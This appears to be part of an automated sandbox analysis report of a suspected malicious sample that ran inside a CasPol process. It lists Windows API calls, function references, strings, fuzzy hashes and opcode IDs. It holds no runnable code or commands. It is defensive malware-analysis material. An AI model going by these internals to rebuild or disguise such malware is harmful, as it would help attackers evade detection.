                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                    • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                    • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                    • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                    • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                    • free.MSVCRT ref: 004185AC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2802642348-0
                                                                                                                    • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                    • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                    • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                    • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                    • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                    • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                    • String ID: strings
                                                                                                                    • API String ID: 3166385802-3030018805
                                                                                                                    • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                    • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0040D8BD
                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                    • memset.MSVCRT ref: 0040D906
                                                                                                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                    • API String ID: 1028950076-4169760276
                                                                                                                    • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                    • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                    APIs
                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                    • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                    • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                    • memset.MSVCRT ref: 0041BA3D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy$memset
                                                                                                                    • String ID: -journal$-wal
                                                                                                                    • API String ID: 438689982-2894717839
                                                                                                                    • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                    • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                    APIs
                                                                                                                    • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                    • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4218492932-0
                                                                                                                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy$memset
                                                                                                                    • String ID: gj
                                                                                                                    • API String ID: 438689982-4203073231
                                                                                                                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                    • String ID: 0$6
                                                                                                                    • API String ID: 2029023288-3849865405
                                                                                                                    • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                    • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                    • memset.MSVCRT ref: 00405455
                                                                                                                    • memset.MSVCRT ref: 0040546C
                                                                                                                    • memset.MSVCRT ref: 00405483
                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$memcpy$ErrorLast
                                                                                                                    • String ID: 6$\
                                                                                                                    • API String ID: 404372293-1284684873
                                                                                                                    • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                    • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                    APIs
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                    • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                    • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                    • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                    • wcscpy.MSVCRT ref: 0040A107
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1331804452-0
                                                                                                                    • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                    • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                    • String ID: advapi32.dll
                                                                                                                    • API String ID: 2012295524-4050573280
                                                                                                                    • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                    • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                    • <%s>, xrefs: 004100A6
                                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                    • API String ID: 3473751417-2880344631
                                                                                                                    • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                    • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscat$_snwprintfmemset
                                                                                                                    • String ID: %2.2X
                                                                                                                    • API String ID: 2521778956-791839006
                                                                                                                    • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                    • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintfwcscpy
                                                                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                    • API String ID: 999028693-502967061
                                                                                                                    • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                    • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                      • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                      • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                    • memset.MSVCRT ref: 0040C439
                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                    • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                    • memset.MSVCRT ref: 0040C4D0
                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4131475296-0
                                                                                                                    • Opcode ID: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                                                                                                                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                    • Opcode Fuzzy Hash: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                                                                                                                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004116FF
                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                    • API String ID: 2618321458-3614832568
                                                                                                                    • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                    • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFilefreememset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2507021081-0
                                                                                                                    • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                    • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                    APIs
                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                    • malloc.MSVCRT ref: 00417524
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                    • free.MSVCRT ref: 00417544
                                                                                                                    • free.MSVCRT ref: 00417562
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4131324427-0
                                                                                                                    • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                    • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                    APIs
                                                                                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                    • free.MSVCRT ref: 0041822B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PathTemp$free
                                                                                                                    • String ID: %s\etilqs_$etilqs_
                                                                                                                    • API String ID: 924794160-1420421710
                                                                                                                    • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                    • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
